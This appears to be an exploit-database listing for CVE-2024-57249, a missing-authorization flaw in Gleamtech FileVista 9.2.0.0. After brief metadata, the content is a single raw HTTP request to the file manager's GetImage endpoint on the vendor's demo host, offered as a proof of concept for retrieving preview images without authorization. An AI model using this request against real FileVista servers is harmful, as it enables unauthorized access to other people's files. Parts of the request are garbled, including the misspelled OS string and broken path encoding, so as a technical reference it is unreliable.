Exploit for Gleamtech FileVista 9.2.0.0 Missing Authorization CVE-2024-57249

Name: Exploit for Gleamtech FileVista 9.2.0.0 Missing Authorization CVE-2024-57249
Rating: 5 (142 reviews)

2025-02-06 | CVSS 7.4

## https://sploitus.com/exploit?id=PACKETSTORM:189019
# Exploit Title: Gleamtech FileVista 9.2.0.0 - Unauthorized Access Preview Image Function
    # Date: Feb 6, 2025
    # Exploit Author: Suthiwat Thepsorn , Theerachai Chanwiroon , Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://www.gleamtech.com/
    # Software Link: https://demos.gleamtech.com/filevista/
    # Version: 9.2.0.0
    # Tested on: macOS
    # CVE : CVE-2024-57249
    
    GET /filevista/filemanager.ashx/GetImage?stateId=f42jmy&path=85b1.+Root+Folder&5d&3a&5c&
    fileName=Spotlight+1-Narrow.jpg&vary=638667480595383765&sid-gt=eizpoo0jqwbrvx2vcscb3rbd HTTP/2
    Host: demos.gleamtech.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac 0S X 10.15; rv:132.0) Gecko/20100101
    Firefox/132.0
    Accept: image/avif, image/webp,image/png,image/svg+xml, image/*;q=0.8,*/*;q=0.5
    Accept-Language: en-US, en; q=0.5
    Accept-Encoding: gzip, deflate, br 
    Referer: https://demos.gleamtech.com/filevista/filemanager.ashx/Preview?path=%5B1.820Root&20Folder$5D&3A&5C&fileName=Spotlight%201-Narrow.jpg&previewerType=ImageViewer&stateId=f42jmy
    Sec-Fetch-Dest: image
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    Priority: u=5, i
    Te: trailers